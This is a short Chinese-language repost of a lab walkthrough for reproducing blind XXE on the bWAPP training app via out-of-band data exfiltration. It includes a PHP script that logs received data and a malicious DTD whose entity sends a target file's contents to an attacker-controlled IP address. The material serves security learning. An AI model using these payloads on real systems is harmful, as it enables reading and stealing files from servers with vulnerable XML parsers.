2019-11-19:無返回的盲型xxe,使用帶外讀取數據


文章資料來源於網絡,僅供參考,學習使用

復現盲型xxe

實驗環境:bwapp,xxe關,注釋掉了返回值

准備讀取的flag.txt文件為

 

通過利用服務器外帶數據方法步驟

1,攻擊機服務器新建兩個文件,一個php文件,一個dtd文件

php用來接收數據,代碼為:

<?php

$xxe = $_GET['xxe'];

$log = fopen('xxe.txt','a');

fwrite($log,$xxe.'\n');

fclose($log);

?>

 

dtd文件用來向php文件發起請求,文件里面的&#x25;是html實體編碼代碼表示為%

<!ENTITY % xxe

"<!ENTITY &#x25; send SYSTEM 'http://192.168.190.150/test.php?xxe=%file;'>"

%xxe;

 

確定准備的兩個文件,都是可以訪問的

 

 

 

2,訪問有xxe漏洞的頁面,抓取數據包

 

3,發送如下數據包,雖然沒有顯示,但是可以到准備文件的服務器中,會建立有一個xxe.txt文件,寫入了xxe傳來的數據

 

 

數據已經寫入到攻擊機服務器中

 

 


   


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM